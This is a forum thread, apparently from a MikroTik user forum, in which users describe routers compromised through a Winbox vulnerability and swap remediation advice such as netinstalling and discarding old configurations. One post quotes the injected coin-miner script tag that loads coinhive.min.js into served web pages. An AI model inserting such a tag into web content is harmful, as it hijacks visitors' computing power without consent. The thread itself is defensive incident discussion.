MikroTik

My router is infection by virus. This using web proxy to create web error coin miner when I open any website and create error html file, script file (to download html file) and user ftp and enable ssh and telnet
I tried to delete all error.html and mirotik.php and script files, delete all user except admin (changed password), disable anything except winbox
I also upgrade newest frimware. But after that, it doesn't work, virus take it back
When i see log, it attack through telnet and ssh using ftp user
Someone help me please
Thank for read and sorry for my bad english

I suggest to follow all MikroTik related news, this issue was fixed in April already. Please read instructions here:
https://blog.mikrotik.com/security/winb ... ility.html

This not helped: https://blog.mikrotik.com/security/winb ... ility.html

My (rb1100ahx2) router OS was 6.43 and I was using last Winbox but all of my web sites on my windows or Linux web servers randomly show infected by coinminer.ah malware (<script src="https:// coinhive.com/lib/coinhive.min.js">)
I did all steps on your blog and update to v6.44beta14 and still have problem.
What do you mean by this: Currently there is no sure way to see if you were affected
I guess My router infected because in last 24Hrs I was thinking malware is on my web servers and did not found any little problem on servers.
I also exported config to file and did not found any SOCKS proxy, please help to solve this, we have many web sites in our network and customers are very angry for this.

If its ever been hacked or suspected of being hacked then you need to Netinstall the current RouterOS version. Use a packet capture tool and you should be able to narrow down the source if its not the Mikrotik.

Updating RouterOS won't magically remove bad parts of your configuration, it only prevents future exploits (assuming you changed your passwords). It's up to you to disinfect the router, the recommended way is to netinstall with a known good config, otherwise export the config, reset to default then import the sanitized config.

I suggest to follow all MikroTik related news, this issue was fixed in April already. Please read instructions here:
https://blog.mikrotik.com/security/winb ... ility.html

@normis,
If I do a netinstall of an infected router, but "keep old configuration" is enabled, do an factory reset immediately after, will this still resolve the problem?

If the old configuration were to contain some script, that sets passwords in your router and disables reinstall, it could do this before you run reset.

CZFAN, were the instructions ever to keep an old corrupted hacked config in place EVER? Does it even sound logical lol? c'mon having an alzyheimers moment or something??
Its not like you dont know how scripts work etc......... and you know how smart hackers are......
Oh I get it, you may already have the corona virus.....
https://unhappyhourblog.files.wordpress ... 9671_n.jpg

If the old configuration were to contain some script, that sets passwords in your router and disables reinstall, it could do this before you run reset.

@normis, Thank You, makes sense.

Had a case where I suspected devices has been infected, did a netinstall but never checked if "keep old config" was enabled.

What is also interesting is that AVG picked up from the binary backup files created before the netinstall of this exact device that it was infected.